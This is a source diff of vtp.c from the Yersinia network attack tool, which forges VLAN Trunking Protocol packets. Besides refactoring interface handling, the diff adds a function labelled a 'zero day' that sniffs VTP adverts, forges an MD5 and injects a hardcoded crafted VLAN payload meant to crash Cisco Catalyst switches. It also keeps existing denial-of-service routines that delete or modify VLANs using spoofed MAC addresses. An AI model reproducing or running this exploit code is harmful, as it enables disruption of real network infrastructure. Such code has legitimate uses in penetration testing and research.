@@ -22,7 +22,7 @@
 
 #ifndef lint
 static const char rcsid[] = 
-       "$Id: vtp.c,v 1.7 2005/09/13 12:10:39 t0mac Exp $";
+       "$Id: vtp.c 22 2007-01-26 19:22:14Z tomac $";
 #endif
 
 #ifdef HAVE_CONFIG_H
@@ -77,12 +77,6 @@ static const char rcsid[] =
 #include <pthread.h>
 #endif
 
-#ifdef HAVE_GETOPT_LONG_ONLY
-#include <getopt.h>
-#else
-#include "getopt.h"
-#endif
-
 #include <stdarg.h>
 
 #include "vtp.h"
@@ -90,16 +84,64 @@ static const char rcsid[] =
 void
 vtp_register(void)
 {
-    protocol_register(PROTO_VTP, "VTP", "VLAN Trunking Protocol", sizeof(struct vtp_data), vtp_init_attribs, vtp_learn_packet,
-	    vtp_get_printable_packet, vtp_get_printable_store,
-	    vtp_load_values, vtp_update_data, vtp_attack, vtp_help, vtp_parser, 
-	    vtp_fields, vtp_get_info, vtp_update_field, vtp_features);
+   protocol_register(PROTO_VTP, "VTP", "VLAN Trunking Protocol", "vtp",
+         sizeof(struct vtp_data), vtp_init_attribs, vtp_learn_packet,
+         vtp_get_printable_packet, vtp_get_printable_store, vtp_load_values,
+         vtp_attack, vtp_update_field, vtp_features, 
+         vtp_comm_params, SIZE_ARRAY(vtp_comm_params), NULL, 0, NULL,
+         vtp_init_comms_struct, PROTO_VISIBLE, vtp_end);
+}
+
+/*
+ * Inicializa la estructura que se usa para relacionar el tmp_data
+ * de cada nodo con los datos que se sacaran por pantalla cuando
+ * se accede al demonio de red.
+ * Teoricamente como esta funcion solo se llama desde term_add_node()
+ * la cual, a su vez, solo es llamada al tener el mutex bloqueado por
+ * lo que no veo necesario que sea reentrante. (Fredy). 
+ */
+int8_t
+vtp_init_comms_struct(struct term_node *node)
+{
+    struct vtp_data *vtp_data;
+    void **comm_param;
+ 
+    comm_param = (void *)calloc(1,sizeof(void *)*SIZE_ARRAY(vtp_comm_params));
+    
+    if (comm_param == NULL)
+    {
+       thread_error("vtp_init_commands_struct calloc error",errno);
+       return -1;
+    }
+
+    vtp_data = node->protocol[PROTO_VTP].tmp_data;
+    
+    node->protocol[PROTO_VTP].commands_param = comm_param;
+    
+    comm_param[VTP_SMAC]      = &vtp_data->mac_source; 
+    comm_param[VTP_DMAC]      = &vtp_data->mac_dest;
+    comm_param[VTP_VERSION]   = &vtp_data->version;
+    comm_param[VTP_CODE]      = &vtp_data->code;  
+    comm_param[VTP_DOMAIN]    = &vtp_data->domain; 
+    comm_param[VTP_MD5]       = &vtp_data->md5; 
+    comm_param[VTP_UPDATER]   = &vtp_data->updater; 
+    comm_param[VTP_REVISION]  = &vtp_data->revision; 
+    comm_param[VTP_TIMESTAMP] = &vtp_data->timestamp; 
+    comm_param[VTP_STARTVAL]  = &vtp_data->start_val;
+    comm_param[VTP_FOLLOWERS] = &vtp_data->followers; 
+    comm_param[VTP_SEQ]       = &vtp_data->seq;
+    comm_param[12]            = NULL; 
+    comm_param[13]            = NULL;
+    comm_param[VTP_VLAN]      = &vtp_data->options;
+
+    return 0;
 }
 
 void
 vtp_th_send(void *arg)
 {
     struct attacks *attacks=NULL;
+    struct vtp_data *vtp_data;
     sigset_t mask;
 
     attacks = arg;
@@ -108,6 +150,12 @@ vtp_th_send(void *arg)
 
     pthread_detach(pthread_self());
 
+    vtp_data = attacks->data;
+
+    vtp_data->dom_len = strlen(vtp_data->domain);
+
+write_log(0,"\n\nvtp_th_send domain=%s  dom_len=%d\n\n",vtp_data->domain,vtp_data->dom_len);
+
     sigfillset(&mask);
 
     if (pthread_sigmask(SIG_BLOCK, &mask, NULL))
@@ -139,7 +187,7 @@ vtp_send(struct attacks *attacks)
 {
     libnet_ptag_t t;
     libnet_t *lhandler;
-    u_int32_t i, vtp_len=0, sent;
+    u_int32_t vtp_len=0, sent;
     struct vtp_data *vtp_data;
     struct vtp_summary *vtp_summ;
     struct vtp_subset *vtp_subset;
@@ -147,9 +195,12 @@ vtp_send(struct attacks *attacks)
     struct vtp_join *vtp_join;
     u_int8_t *vtp_packet, *aux;
     u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 };
-        
-    vtp_data = attacks->data;
-
+    dlist_t *p;
+    struct interface_data *iface_data;
+    struct interface_data *iface_data2;        
+ 
+   vtp_data = attacks->data;
+    
     switch(vtp_data->code)
     {
         case VTP_SUMM_ADVERT:
@@ -266,9 +317,9 @@ vtp_send(struct attacks *attacks)
         break;
     }
     
-    for ( i = 0; i < MAX_INTERFACES; i++) {
-        if (attacks->used_ints[i] == 1) {
-            lhandler = interfaces[i].libnet_handler;
+    for (p = attacks->used_ints->list; p; p = dlist_next(attacks->used_ints->list, p)) {
+       iface_data = (struct interface_data *) dlist_data(p);
+            lhandler = iface_data->libnet_handler;
 
             t = libnet_build_802_2(
                     0xaa,            /* DSAP */   
@@ -289,7 +340,7 @@ vtp_send(struct attacks *attacks)
 
             t = libnet_build_802_3(
                     vtp_data->mac_dest,       /* ethernet destination */
-                    (attacks->mac_spoofing) ? vtp_data->mac_source : interfaces[i].etheraddr,
+                    (attacks->mac_spoofing) ? vtp_data->mac_source : iface_data->etheraddr,
                     /* ethernet source */
                     LIBNET_802_2_H + vtp_len, /* frame size */
                     NULL,                     /* payload */
@@ -318,8 +369,8 @@ vtp_send(struct attacks *attacks)
             }
             libnet_clear_packet(lhandler);
             protocols[PROTO_VTP].packets_out++;
-            interfaces[i].packets_out[PROTO_VTP]++;
-        }
+            iface_data2 = interfaces_get_struct(iface_data->ifname);
+            iface_data2->packets_out[PROTO_VTP]++;
     }
 
     free(vtp_packet);    
@@ -393,7 +444,7 @@ vtp_th_dos_del_all(void *arg)
     while (!attacks->attack_th.stop)
     {
         memset((void *)&vtp_data_learned,0,sizeof(struct vtp_data));
-        interfaces_get_packet(&attacks->attack_th.stop, &header, packet,
+        interfaces_get_packet(attacks->used_ints, NULL, &attacks->attack_th.stop, &header, packet,
                               PROTO_VTP, NO_TIMEOUT);
         if (attacks->attack_th.stop)
            break;   
@@ -426,7 +477,8 @@ vtp_th_dos_del_all(void *arg)
                               vtp_data_learned.dom_len, 
                               vlan_cisco,
                               sizeof(vlan_cisco), 
-                              vtp_data->md5) < 0)
+                              vtp_data->md5,
+                              vtp_data_learned.version) < 0)
            break;
 
         vtp_data->code = VTP_SUMM_ADVERT;
@@ -443,10 +495,10 @@ vtp_th_dos_del_all(void *arg)
         }                
         vtp_data->revision = vtp_data_learned.revision+1;
         
-        usleep(200000);
+        thread_usleep(200000);
         if (vtp_send(attacks)< 0)
            break;
-        usleep(200000);
+        thread_usleep(200000);
         
         vtp_data->code = VTP_SUBSET_ADVERT;
         vtp_data->seq = 1;
@@ -469,7 +521,8 @@ vtp_th_dos_del_all(void *arg)
  */
 int8_t
 vtp_generate_md5(char *secret, u_int32_t updater, u_int32_t revision, char *domain, 
-                 u_int8_t dom_len, u_int8_t *vlans, u_int16_t vlans_len, u_int8_t *md5)
+                 u_int8_t dom_len, u_int8_t *vlans, u_int16_t vlans_len, u_int8_t *md5,
+                 u_int8_t version)
 {
     u_int8_t *data, md5_secret[16];
     struct vtp_summary *vtp_summ;
@@ -486,8 +539,8 @@ vtp_generate_md5(char *secret, u_int32_t updater, u_int32_t revision, char *doma
        md5_sum(data, strlen(secret), md5_secret);
 
     vtp_summ = (struct vtp_summary *)(data+16);
-    
-    vtp_summ->version = 0x01;
+write_log(0,"Se calcula MD5 con version=%d\n",version);    
+    vtp_summ->version = version;
     vtp_summ->code = 0x01;
     if (dom_len > VTP_DOMAIN_SIZE)
     {
@@ -591,7 +644,7 @@ vtp_modify_vlan(u_int8_t op, struct attacks *attacks)
     while (!attacks->attack_th.stop)
     {
         memset((void *)&vtp_data_learned,0,sizeof(struct vtp_data));
-        interfaces_get_packet(&attacks->attack_th.stop, &header, packet,
+        interfaces_get_packet(attacks->used_ints, NULL, &attacks->attack_th.stop, &header, packet,
                               PROTO_VTP, NO_TIMEOUT);
         if (attacks->attack_th.stop)
            break;   
@@ -669,11 +722,14 @@ vtp_modify_vlan(u_int8_t op, struct attacks *attacks)
                               vtp_data_learned.dom_len, 
                               vtp_data_learned.vlan_info,
                               vtp_data_learned.vlans_len, 
-                              vtp_data->md5) < 0)
+                              vtp_data->md5,
+                              vtp_data_learned.version) < 0)
             break;
 
+        vtp_data->version = vtp_data_learned.version;
         vtp_data->code = VTP_SUMM_ADVERT;
         vtp_data->followers = 1;
+        
         if (vtp_data_learned.dom_len > VTP_DOMAIN_SIZE)
         {
             vtp_data->dom_len = VTP_DOMAIN_SIZE;
@@ -688,13 +744,16 @@ vtp_modify_vlan(u_int8_t op, struct attacks *attacks)
 
         if (vtp_send(attacks)< 0)
            break;
-        usleep(200000);
+        thread_usleep(200000);
         
+        vtp_data->version = vtp_data_learned.version;
         vtp_data->code = VTP_SUBSET_ADVERT;
         vtp_data->seq = 1;
         vtp_data->vlans_len = vtp_data_learned.vlans_len;
         vtp_data->vlan_info = vtp_data_learned.vlan_info;          
 
+write_log(0," Vlan_len after = %d\n",vtp_data_learned.vlans_len);
+
         vtp_send(attacks);
 
         break;
@@ -920,6 +979,148 @@ vtp_th_dos_add_exit(struct attacks *attacks)
     pthread_exit(NULL);
 }
 
+/*
+ * Zero day crashing Catalyst!!
+ */
+void
+vtp_th_dos_crash(void *arg)
+{
+    struct attacks *attacks=NULL;
+    struct vtp_data *vtp_data, vtp_data_learned;
+    struct pcap_pkthdr header;
+    struct pcap_data pcap_aux;
+    struct libnet_802_3_hdr *ether;
+    struct timeval now;
+    u_int8_t *packet=NULL, *cursor;
+    sigset_t mask;
+    /* Cisco vlans for crashing */
+    u_int8_t vlan_cisco[]={ 0x75, 0x00, 0x01, 0x07, 0x20, 0x00, 0x02, 0x0c, 
+                            0x03, 0xea, 0x05, 0xdc, 0x00, 0x01, 0x8a, 0x8a, 
+                            0x66, 0x64, 0x64, 0x69, 0x2d, 0x64, 0x65, 0x66, 
+                            0x61, 0x75, 0x6c, 0x74, 0x01, 0x01, 0x00, 0x00, 
+                            0x04, 0x01, 0x00, 0x00, 0x28, 0x00, 0x03, 0x12, 
+                            0x03, 0xeb, 0x05, 0xdc, 0x00, 0x01, 0x8a, 0x8b, 
+                            0x74, 0x6f, 0x6b, 0x65, 0x6e, 0x2d, 0x72, 0x69, 
+                            0x6e, 0x67, 0x2d, 0x64, 0x65, 0x66, 0x61, 0x75, 
+                            0x6c, 0x74, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00,
+                            0x04, 0x01, 0x00, 0x00, 0x24, 0x00, 0x04, 0x0f, 
+                            0x03, 0xec, 0x05, 0xdc, 0x00, 0x01, 0x8a, 0x8c, 
+                            0x66, 0x64, 0x64, 0x69, 0x6e, 0x65, 0x74, 0x2d, 
+                            0x64, 0x65, 0x66, 0x61, 0x75, 0x6c, 0x74, 0x00, 
+                            0x02, 0x01, 0x00, 0x00, 0x03, 0x01, 0x00, 0x01, 
+                            0x24, 0x00, 0x05, 0x0d, 0x03, 0xed, 0x05, 0xdc, 
+                            0x00, 0x01, 0x8a, 0x8d, 0x74, 0x72, 0x6e, 0x65, 
+                            0x74, 0x2d, 0x64, 0x65, 0x66, 0x61, 0x75, 0x6c, 
+                            0x74, 0x00, 0x00, 0x00, 0x02, 0x01, 0x00, 0x00,
+                            0x03, 0x01, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 
+                            0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
+                            0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
+                            0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+                            0x00, 0x00, 0x00, 0x00, 0xf1, 0x00, 0x00, 0x00, 
+                            0x00, 0x00, 0x0c, 0x20 };
+
+    sigfillset(&mask);
+
+    if (pthread_sigmask(SIG_BLOCK, &mask, NULL))
+    {
+       thread_error("vtp_th_dos_del_all pthread_sigmask()",errno);
+       vtp_th_dos_crash_exit(attacks);
+    }
+
+    attacks = arg;
+    
+    vtp_data = attacks->data;
+
+    gettimeofday(&now, NULL);
+
+    header.ts.tv_sec = now.tv_sec;
+    header.ts.tv_usec = now.tv_usec;
+    
+    if ((packet = calloc(1, SNAPLEN)) == NULL)
+        vtp_th_dos_crash_exit(attacks);
+
+    
+    while (!attacks->attack_th.stop)
+    {
+        memset((void *)&vtp_data_learned,0,sizeof(struct vtp_data));
+        interfaces_get_packet(attacks->used_ints, NULL, &attacks->attack_th.stop, &header, packet,
+                              PROTO_VTP, NO_TIMEOUT);
+
+        if (attacks->attack_th.stop)
+           break;   
+           
+        cursor = (packet + LIBNET_802_3_H + LIBNET_802_2_H);
+
+        ether = (struct libnet_802_3_hdr *) packet;
+        
+        if (!memcmp(vtp_data->mac_source,ether->_802_3_shost,6) )
+          continue; /* Oops!! Its our packet... */
+
+        pcap_aux.header = &header;
+        pcap_aux.packet = packet;
+                                                                                          
+        if (vtp_load_values(&pcap_aux, &vtp_data_learned) < 0)
+           continue;
+
+        if ((vtp_data_learned.code != VTP_SUMM_ADVERT) 
+             && (vtp_data_learned.code != VTP_SUBSET_ADVERT) )
+           continue;
+
+        if (vtp_generate_md5( NULL,
+                              vtp_data->updater,
+                              (vtp_data_learned.revision+1),
+                              vtp_data_learned.domain, 
+                              vtp_data_learned.dom_len, 
+                              vlan_cisco,
+                              sizeof(vlan_cisco), 
+                              vtp_data->md5,
+                              vtp_data_learned.version) < 0)
+           break;
+
+        vtp_data->code = VTP_SUMM_ADVERT;
+        vtp_data->followers = 1;
+        if (vtp_data_learned.dom_len > VTP_DOMAIN_SIZE)
+        {
+            vtp_data->dom_len = VTP_DOMAIN_SIZE;
+            memcpy(vtp_data->domain,vtp_data_learned.domain,VTP_DOMAIN_SIZE);
+        }
+        else
+        {
+            vtp_data->dom_len = vtp_data_learned.dom_len;
+            memcpy(vtp_data->domain,vtp_data_learned.domain,vtp_data_learned.dom_len);
+        }                
+        vtp_data->revision = vtp_data_learned.revision+1;
+        
+        usleep(200000);
+        if (vtp_send(attacks)< 0)
+           break;
+        usleep(200000);
+        
+        vtp_data->code = VTP_SUBSET_ADVERT;
+        vtp_data->seq = 1;
+      
+        vtp_data->vlan_info = vlan_cisco;
+        vtp_data->vlans_len = sizeof(vlan_cisco);
+        vtp_send(attacks);
+        
+        break; 
+    }
+
+    free(packet);
+    
+    vtp_th_dos_crash_exit(attacks);
+}
+
+
+void
+vtp_th_dos_crash_exit(struct attacks *attacks)
+{
+    if (attacks)
+       attack_th_exit(attacks);
+
+    pthread_exit(NULL);
+}
+
 
 int8_t
 vtp_init_attribs(struct term_node *node)
@@ -936,7 +1137,7 @@ vtp_init_attribs(struct term_node *node)
     
     vtp_data->version = VTP_DFL_VERSION;
     
-    memcpy(vtp_data->domain,VTP_DFL_DOMAIN,sizeof(VTP_DFL_DOMAIN));
+    memcpy(vtp_data->domain, VTP_DFL_DOMAIN,sizeof(VTP_DFL_DOMAIN));
     
     vtp_data->dom_len = VTP_DFL_DOM_LEN;
     
@@ -944,6 +1145,8 @@ vtp_init_attribs(struct term_node *node)
 
     vtp_data->start_val = 1;
 
+    vtp_data->revision = 1;
+
     vtp_data->followers = 1;
 
     vtp_data->seq = 1;
@@ -954,26 +1157,33 @@ vtp_init_attribs(struct term_node *node)
 }
 
 
-
-
 int8_t
-vtp_learn_packet(int8_t iface, u_int8_t *stop, void *data, struct pcap_pkthdr *header)
+vtp_learn_packet(struct attacks *attacks, char *iface, u_int8_t *stop, void *data, struct pcap_pkthdr *header)
 {
     struct vtp_data *vtp_data;
     struct pcap_data pcap_aux;
     u_int8_t *packet, *cursor, got_vtp_packet = 0;
-    int8_t iface_learn;
+    dlist_t *p;
+    struct interface_data *iface_data;
     
     vtp_data = data;
 
     if ((packet = calloc(1, SNAPLEN)) == NULL)
         return -1;
 
+    if (iface) {
+       p = dlist_search(attacks->used_ints->list, attacks->used_ints->cmp, iface);
+       if (!p)
+          return -1;
+
+       iface_data = (struct interface_data *) dlist_data(p);
+    } else {
+       iface_data = NULL;
+    }
+
     while (!got_vtp_packet && !(*stop))
     {
-        iface_learn = interfaces_get_packet(stop, header, packet, PROTO_VTP, NO_TIMEOUT);
-        if ( (iface!=ALL_INTS) && (iface_learn!=iface) )
-           continue;
+        interfaces_get_packet(attacks->used_ints, iface_data, stop, header, packet, PROTO_VTP, NO_TIMEOUT);
         if (*stop)
         {
             free(packet);
@@ -1009,13 +1219,14 @@ vtp_get_printable_packet(struct pcap_data *data)
     u_int16_t *aux_short;
 #ifdef LBL_ALIGN
     u_int32_t aux_long2;
-    u_int8_t *aux;
+    u_int8_t *aux2;
 #endif
     char **field_values, *tlv;
     struct vlan_info *vlan_info;
     u_int16_t vlans_len=0;
+char aux5[22];    
 
-    if ((field_values = (char **) protocol_create_printable(VTP_TOTAL_FIELDS, vtp_fields)) == NULL) {
+    if ((field_values = (char **) protocol_create_printable(protocols[PROTO_VTP].nparams, protocols[PROTO_VTP].parameters)) == NULL) {
 	    thread_error("vtp_get_rpintable calloc()",errno);
 	    return NULL;
     }
@@ -1051,7 +1262,7 @@ vtp_get_printable_packet(struct pcap_data *data)
     
     ptr+=2;
    
-    if (*ptr < 24)//VTP_DOMAIN_SIZE )
+    if (*ptr < 24)/*VTP_DOMAIN_SIZE )*/
     {
        memcpy(field_values[VTP_DOMAIN], (ptr+1), *ptr);
        field_values[VTP_DOMAIN][*ptr]=0;
@@ -1070,13 +1281,13 @@ vtp_get_printable_packet(struct pcap_data *data)
     switch(*code)
     {
        case VTP_SUMM_ADVERT:
-            snprintf(field_values[VTP_REVISION], 9, "%08d", ntohl(*aux_long));
+            snprintf(field_values[VTP_REVISION], 11, "%010hd", ntohl(*aux_long));
               aux_long++;
 
 #ifdef LBL_ALIGN 
     memcpy((void *)&aux_long2, (void *)aux_long,4);
-    aux = libnet_addr2name4(aux_long2, LIBNET_DONT_RESOLVE);
-    strncpy(field_values[VTP_UPDATER],aux,16);
+    aux2 = libnet_addr2name4(aux_long2, LIBNET_DONT_RESOLVE);
+    strncpy(field_values[VTP_UPDATER],aux2,16);
 #else
     /* Source IP */
     strncpy(field_values[VTP_UPDATER], libnet_addr2name4(*aux_long, LIBNET_DONT_RESOLVE),
@@ -1093,7 +1304,7 @@ vtp_get_printable_packet(struct pcap_data *data)
        break;
 
        case VTP_SUBSET_ADVERT:
-            snprintf(field_values[VTP_REVISION], 9, "%08d", ntohl(*aux_long));
+            snprintf(field_values[VTP_REVISION], 11, "%010hd", ntohl(*aux_long));
             field_values[VTP_MD5][0]=0;
             field_values[VTP_UPDATER][0] = 0;
             ptr+=4; /* Point to VLANs info */
@@ -1102,7 +1313,7 @@ vtp_get_printable_packet(struct pcap_data *data)
             
             cursor = ptr;
             i = 0;
-            
+#ifdef KKKKKKKKKKK            
             tlv = field_values[VTP_VLAN];
                 
             while( ((cursor+sizeof(struct vlan_info)) < (ptr+vlans_len)) && (i<MAX_TLV) )
@@ -1112,6 +1323,11 @@ vtp_get_printable_packet(struct pcap_data *data)
                   break;
                memset(aux,0,sizeof(aux));
                snprintf(aux, MAX_VALUE_LENGTH, "VLAN %d", ntohs(vlan_info->id));
+
+               memset(aux5,0,sizeof(aux5));
+               snprintf(aux5, 20, "%s", (char *)(vlan_info+1));
+write_log(0," tlv[%d]=%p    %s  '%s'  vlan_info->len=%d   vlan_info->name_len=%d\n",VTP_VLAN,tlv,aux,aux5,vlan_info->len,vlan_info->name_len);
+
                memcpy(tlv,aux,strlen(aux));
                tlv+=strlen(aux)+1;
                if (vlan_info->len <= vlan_info->name_len)
@@ -1136,7 +1352,10 @@ vtp_get_printable_packet(struct pcap_data *data)
                }
                i++;
                cursor+=vlan_info->len;
+write_log(0,"pasa cursor+=vlan_info->len...\n");
+thread_usleep(500000);
             }
+#endif
             
        break;
        
@@ -1148,7 +1367,7 @@ vtp_get_printable_packet(struct pcap_data *data)
        
        case VTP_REQUEST:
             aux_short = (u_int16_t *)aux_long;
-            snprintf(field_values[VTP_STARTVAL], 9, "%08d", ntohs(*aux_short));
+            snprintf(field_values[VTP_STARTVAL], 6, "%05hd", ntohs(*aux_short));
             field_values[VTP_MD5][0] = 0;
             field_values[VTP_REVISION][0] = 0;
             field_values[VTP_UPDATER][0] = 0;
@@ -1163,15 +1382,13 @@ char **
 vtp_get_printable_store(struct term_node *node)
 {
     struct vtp_data *vtp_tmp;
-#ifdef LBL_ALIGN
-    u_int8_t *aux;
-#endif
     char **field_values;
 
     /* smac + dmac + version + code + domain + md5 + updater + revision +
      * timestamp + startval + followers + null = 12
      */
-    if ((field_values = (char **) protocol_create_printable(VTP_TOTAL_FIELDS, vtp_fields)) == NULL) {
+
+    if ((field_values = (char **) protocol_create_printable(protocols[PROTO_VTP].nparams, protocols[PROTO_VTP].parameters)) == NULL) {
 	    write_log(0, "Error in calloc\n");
 	    return NULL;
     }
@@ -1207,11 +1424,11 @@ vtp_get_printable_store(struct term_node *node)
 
     parser_get_formated_inet_address(vtp_tmp->updater, field_values[VTP_UPDATER], 16);
 
-    snprintf(field_values[VTP_REVISION], 9, "%08d", vtp_tmp->revision);
+    snprintf(field_values[VTP_REVISION], 11, "%010hd", vtp_tmp->revision);
 
     memcpy(field_values[VTP_TIMESTAMP], vtp_tmp->timestamp, 12);
 
-    snprintf(field_values[VTP_STARTVAL], 9, "%08d", vtp_tmp->start_val);            
+    snprintf(field_values[VTP_STARTVAL], 6, "%05hd", vtp_tmp->start_val);            
 
     snprintf(field_values[VTP_FOLLOWERS], 4, "%03d", vtp_tmp->followers);
 
@@ -1233,7 +1450,7 @@ vtp_load_values(struct pcap_data *data, void *values)
     u_int32_t *aux_long;
     u_int16_t *aux_short;
 #ifdef LBL_ALIGN
-    u_int32_t *aux_long2;
+    u_int32_t aux_long2;
     u_int16_t *aux_short2;
 #endif
     vtp = (struct vtp_data *)values;
@@ -1337,153 +1554,6 @@ vtp_load_values(struct pcap_data *data, void *values)
 }
 
 
-int8_t 
-vtp_update_data(int8_t state, int8_t key, int8_t position, struct term_node *node)
-{
-    struct vtp_data *vtp_data;
-    struct in_addr addr;
-    u_int32_t aux_long;
-    u_int16_t i;
-    u_int8_t aux=0;
-    char **vtp;
-    
-    vtp_data = node->protocol[PROTO_VTP].tmp_data;
-
-    if ((vtp = vtp_get_printable_store(node)) == NULL) {
-	    write_log(0, "Error in vtp_get_printable_store\n");
-	    return -1;
-    }
-
-    switch(state)
-    {
-        /* Source MAC */
-        case VTP_SMAC:
-            vtp[VTP_SMAC][position] = key;
-            for (i=0; i < 6; i++) 
-                vtp_data->mac_source[i] = strtoul(&vtp[VTP_SMAC][3*i], 
-                                                  (char **)NULL, 16);
-        break;
-
-        /* Destination MAC */
-        case VTP_DMAC:
-            vtp[VTP_DMAC][position] = key;
-            for (i=0; i < 6; i++) 
-                vtp_data->mac_dest[i] = strtoul(&vtp[VTP_DMAC][3*i], 
-                                               (char **)NULL, 16);
-        break;
-
-        /* Version */
-        case VTP_VERSION:
-            vtp[VTP_VERSION][position] = key;
-            vtp_data->version = strtoul(vtp[VTP_VERSION], (char **)NULL, 16);
-        break;
-
-        /* Code */
-        case VTP_CODE:
-            vtp[VTP_CODE][position] = key;
-            vtp_data->code = strtoul(vtp[VTP_CODE], (char **)NULL, 16);
-        break;
-
-        /* Domain */
-        case VTP_DOMAIN:
-            vtp[VTP_DOMAIN][position] = key;
-            memcpy((void *)vtp_data->domain, (void *)vtp[VTP_DOMAIN],
-                    VTP_DOMAIN_SIZE);
-            vtp_data->dom_len = strlen(vtp_data->domain);
-        break;
-
-        /* MD5 */
-        case VTP_MD5:
-            vtp[VTP_MD5][position] = key;
-            for (i=0; i < 16; i++)
-            {
-                if (i!=15)
-                {
-                    aux = vtp[VTP_MD5][2*i+2];
-                    vtp[VTP_MD5][2*i+2] = ':';
-                } 
-                vtp_data->md5[i] = strtoul(&vtp[VTP_MD5][2*i], (char **)NULL, 16);
-                if (i!=15)
-                   vtp[VTP_MD5][2*i+2] = aux;
-            }
-        break;
-
-        /* Updater IP */
-        case VTP_UPDATER:
-            vtp[VTP_UPDATER][position] = key;
-            if (parser_get_inet_aton(vtp[VTP_UPDATER], &addr) < 0) {
-                write_log(0, "Error in inet_aton\n");
-                return -1;
-            }
-            aux_long = ntohl(addr.s_addr);
-            memcpy((void *)&vtp_data->updater, (void *)&aux_long, 4);
-        break;
-
-        /* Revision */
-        case VTP_REVISION:
-            vtp[VTP_REVISION][position] = key;
-            vtp_data->revision = strtoul(vtp[VTP_REVISION], (char **)NULL, 10);
-        break;
-
-
-        case VTP_TIMESTAMP:
-            vtp[VTP_TIMESTAMP][position] = key;
-            memcpy((void *)vtp_data->timestamp, (void *)vtp[VTP_TIMESTAMP], 12);
-        break;
-
-        /* Start Value */
-        case VTP_STARTVAL:
-            vtp[VTP_STARTVAL][position] = key;
-            vtp_data->start_val = strtoul(vtp[VTP_STARTVAL], (char **)NULL, 10);
-        break;
-
-        /* Followers */
-        case VTP_FOLLOWERS:
-            vtp[VTP_FOLLOWERS][position] = key;
-            vtp_data->followers = strtoul(vtp[VTP_FOLLOWERS], (char **)NULL, 10);
-        break;
-
-        /* Sequence number */
-        case VTP_SEQ:
-            vtp[VTP_SEQ][position] = key;
-            vtp_data->seq = strtoul(vtp[VTP_SEQ], (char **)NULL, 10);
-        break;
-
-    }
-
-    i = 0;
-    while(vtp[i]) {
-	free(vtp[i]);
-	i++;
-    }
-
-    free(vtp);
-
-    return 0;
-}
-
-char *
-vtp_get_info(u_int8_t field, char *value)
-{
-    u_int8_t i;
-
-    i = 0;
-
-    switch (field) 
-    {
-        case VTP_CODE:
-            while (vtp_code[i].desc) 
-            {
-                if (vtp_code[i].type == strtoul(value, NULL, 16))
-                    return vtp_code[i].desc;
-                i++;
-            }
-        break;
-    }
-
-    return "(Unknown)";
-}
-
 int8_t 
 vtp_update_field(int8_t state, struct term_node *node, void *value)
 {
@@ -1565,163 +1635,8 @@ vtp_update_field(int8_t state, struct term_node *node, void *value)
 }
 
 
-void
-vtp_help(void)
+int8_t
+vtp_end(struct term_node *node)
 {
-    write_log(2,"%s\n", bin_data);
-    write_log(2,"\nUsage: %s vtp [-hM] [-v version] [-i interface]\n", PACKAGE);
-    write_log(2,"       [-smac hw_addr] [-dmac hw_addr] [-code code]\n");
-    write_log(2,"       [-domain domain] [-attack attack]\n\n");
-    write_log(2,"           -h    This help screen.\n\n");         
-
-    write_log(2,"Please, see the man page for a full list of options and many examples.\n");
-    write_log(2,"Send your bugs & suggestions to the Yersinia developers <yersinia@wasahero.org>\n\n");  
-}
-
-
-/*
- * VTP parser...
- */
-int8_t 
-vtp_parser( struct term_node *node, int8_t argc, char **args, void *tmp_data)
-{
-    int8_t carac, indx, aux, tmp, ifaces;
-    int opt_ind;
-    struct vtp_data *vtp_data;
-    struct term_tty *term_tty=NULL;
-    struct attack *first_attack;
-
-    static struct option options[] =
-    {
-        { "help",         0, 0, 'h' },        
-        { "M",            0, 0, 'M' },        
-        { "attack",       1, 0, 0 },
-        { "X",            1, 0, 0 },
-        { "i",            1, 0, 1 },
-        { "domain",       1, 0, 2 },
-        { "smac",         1, 0, 3 },
-        { "dmac",         1, 0, 4 },
-        { "code",         1, 0, 5 },
-        { "v",            1, 0, 6 },
-        { "version",      1, 0, 6 },
-        { 0, 0, 0, 0 }
-    };
-
-    vtp_data = node->protocol[PROTO_VTP].tmp_data;
-
-    ifaces = 0;
-
-    term_tty = node->specific;
-
-    while( (carac=getopt_long_only(argc,args,"h",
-                    options, &opt_ind)) != EOF)
-    {
-        switch(carac) 
-        {
-            case 0:
-                aux=atoi(optarg);
-                aux--;  /* Because our array starts with zero but user starts with 1... :) */
-                indx = parser_command2index(vtp_attack, aux);
-                if (vtp_attack[indx].s != NULL )
-                    term_tty->attack = indx;
-                else
-                {
-                    write_log(2,"\n  Ouch!! Invalid attack!! Valid %s ATTACK types are:\n", PACKAGE);
-                    first_attack = vtp_attack;
-                    while (first_attack->s != NULL) 
-                    {
-                        write_log(2,"         %d: %s attack %s\n",first_attack->v+1,
-                                (first_attack->type)?"DOS":"NONDOS",
-                                first_attack->s);
-                        ++first_attack;
-                    }
-                    write_log(2,"\n");
-                    return -1;
-                }
-                break;
-
-            case 1:
-                if ((tmp = interfaces_get(optarg)) == -1)
-                {
-                   write_log(2,"Unable to use interface %s!! (Maybe nonexistent?)\n\n",optarg);
-                   return -1;
-                }
-                 /* Don't repeat interface...*/
-                if (!node->used_ints[tmp])
-                {
-                    if ((tmp = interfaces_add(optarg)) == -1)
-                    {
-                       write_log(2,"Unable to use interface %s!! (Maybe nonexistent?)\n\n",optarg);
-                       return -1;
-                    }
-                    node->used_ints[tmp] = 1;
-                    ifaces++;
-                }
-            break;
-
-            case 2:
-                strncpy(vtp_data->domain,optarg, (VTP_DOMAIN_SIZE-1));
-                if (strlen(optarg) > (VTP_DOMAIN_SIZE-1)) 
-                   vtp_data->dom_len = (VTP_DOMAIN_SIZE-1);
-                else
-                   vtp_data->dom_len = strlen(optarg);
-            break;
-
-            case 3:
-                if (parser_vrfy_mac(optarg, vtp_data->mac_source)) {
-                    write_log(2, "Source MAC address incorrect!!\n");
-                    return -1;
-                }
-
-            case 4: 
-                if ( parser_vrfy_mac(optarg, vtp_data->mac_dest) )
-                {
-                    write_log(2,"Destination MAC address incorrect!!\n");
-                    return -1;
-                }
-            break;
-
-            case 5: 
-              vtp_data->code = atoi(optarg);
-            break;
-
-            case 6:
-                vtp_data->version = atoi(optarg);
-            break;
-
-            case 'h': vtp_help();
-                      return 0;
-            break;
-
-			case 'M':
-			    node->mac_spoofing = 0;
-			break;
-
-            case '?': return -1;
-            break;       
-        }
-    }
-
